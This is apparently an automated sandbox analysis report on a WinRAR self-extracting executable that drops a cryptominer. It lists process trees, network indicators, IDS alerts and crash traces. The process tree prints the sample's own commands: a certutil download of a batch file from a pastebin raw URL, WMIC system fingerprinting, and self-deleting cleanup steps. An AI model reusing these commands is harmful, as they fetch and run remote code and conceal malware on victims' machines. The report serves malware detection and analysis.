Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 2, 2022, 9:26 a.m.	May 2, 2022, 9:28 a.m.

Size	3.0MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`def5558538f028028677e6118b46009d`
SHA256	`33c1664c6cb476c7284eaf2cb0607db76b33c24e57dc8d189feeaa885e2b90ff`
CRC32	`E7764612`
ssdeep	`49152:0bHToXx6w426bVbJIOxc/3fsmPjlO78TegDF9xx67e:X6j26DI+c/3fsm7lO78TeCF9xx67e`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara	IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check UPX_Zero - UPX packed file Win32_WinRAR_SFX_Zero - Win32 WinRAR SFX Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature

64a1.com "C:\Users\test22\AppData\Local\Temp\64a1.com"
2772
- xagal.exe "C:\Windows (x86)\xagal.exe"
  2976
  - cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E474.tmp\E475.bat "C:\Windows (x86)\xagal.exe""
    2076
    - certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/GUqDzHQW "C:\Windows (x86)\version.bat"
      2152
    - cmd.exe cmd /c del "C:\Windows (x86)\version.bat"
      2284
    - cmd.exe C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
      2420
      - WMIC.exe wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
        2452
    - cmd.exe C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list |find "="
      2644
      - WMIC.exe wmic csproduct get UUID /format:list
        2748
      - find.exe find "="
        2996
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows (x86)\run.vbs"
      2892
      - cmd.exe cmd /c ""C:\Windows (x86)\xcls.bat" "
        3060
        
        WMIC.exe wmic process where name='xagal.exe' delete
        2024
        
        explorer.exe "C:\Windows (x86)\explorer.exe"
        2184
        
        cmd.exe cmd /c del "C:\Windows (x86)\xcls.bat"
        2444

Name	Response	Post-Analysis Lookup
pool.hashvault.pro	A 131.153.76.130 A 125.253.92.50	125.253.92.50
pastebin.com	A 172.67.34.170 A 104.20.67.143 A 104.20.68.143	104.20.67.143

IP Address	Status	Action
125.253.92.50	Active	Moloch
164.124.101.2	Active	Moloch
172.67.34.170	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:62062 -> 164.124.101.2:53	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	Crypto Currency Mining Activity Detected
TCP 192.168.56.101:49167 -> 172.67.34.170:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49168 -> 172.67.34.170:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.101:49190 125.253.92.50:80	None	None	None
TLSv1 192.168.56.101:49167 172.67.34.170:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1 192.168.56.101:49168 172.67.34.170:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd

Queries for the computername (4 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 2, 2022, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 9:26 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 2, 2022, 9:26 a.m.			0	0
IsDebuggerPresent May 2, 2022, 9:26 a.m.			0	0
IsDebuggerPresent May 2, 2022, 9:26 a.m.			0	0
IsDebuggerPresent May 2, 2022, 9:26 a.m.			0	0
IsDebuggerPresent May 2, 2022, 9:26 a.m.			0	0

Command line console output was observed (34 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: C:\Windows (x86)> console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: echo console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: off console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: Could Not Find C:\Windows (x86)\config.json console_handle: 0x000000000000000b	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: C:\Windows (x86)\1xs.txt console_handle: 0x000000000000000b	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: C:\Windows (x86)\2xs.txt console_handle: 0x000000000000000b	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: C:\Windows (x86)\3xs.txt console_handle: 0x000000000000000b	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: Deleted file - C:\Windows (x86)\1xs.txt console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: Deleted file - C:\Windows (x86)\2xs.txt console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: Deleted file - C:\Windows (x86)\3xs.txt console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: ** Online ** console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: 003f console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: CertUtil: -URLCache command completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: C:\Windows (x86)\version.bat console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: The process cannot access the file because it is being used by another process. console_handle: 0x000000000000000b	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: C:\Windows (x86)> console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: wmic console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: process where name='xagal.exe' delete console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: C:\Windows (x86)> console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: del console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: /s /q "C:\Windows (x86)\xagal.exe" console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: Deleted file - C:\Windows (x86)\xagal.exe console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: C:\Windows (x86)> console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: del console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: /s /q "C:\Windows (x86)\run.vbs" console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: Deleted file - C:\Windows (x86)\run.vbs console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: C:\Windows (x86)> console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: start console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: "" "C:\Windows (x86)\explorer.exe" console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: C:\Windows (x86)> console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: start console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: /b "" cmd /c del "C:\Windows (x86)\xcls.bat" console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: exit console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 9:26 a.m.	buffer: /b console_handle: 0x0000000000000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 2, 2022, 9:26 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.gfids

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

One or more processes crashed (3 events)

Time & API	Arguments	Status
__exception__ May 2, 2022, 9:26 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda7a49d registers.r14: 0 registers.r15: 0 registers.rcx: 43050832 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 43056784 registers.r11: 43052592 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1976152494 registers.r13: 0	1
__exception__ May 2, 2022, 9:26 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda7a49d registers.r14: 0 registers.r15: 0 registers.rcx: 42197328 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 42203280 registers.r11: 42199088 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1977306758 registers.r13: 0	1
__exception__ May 2, 2022, 9:26 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda7a49d registers.r14: 0 registers.r15: 0 registers.rcx: 50128528 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 50134480 registers.r11: 50130288 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1973703595 registers.r13: 0	1

Time & API

Arguments

Status

Return

Repeated

__exception__

May 2, 2022, 9:26 a.m.

stacktrace:

RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda7a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 43050832
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 43056784
registers.r11: 43052592
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1976152494
registers.r13: 0

__exception__

May 2, 2022, 9:26 a.m.

stacktrace:

RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda7a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 42197328
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 42203280
registers.r11: 42199088
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1977306758
registers.r13: 0

__exception__

May 2, 2022, 9:26 a.m.

stacktrace:

RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57
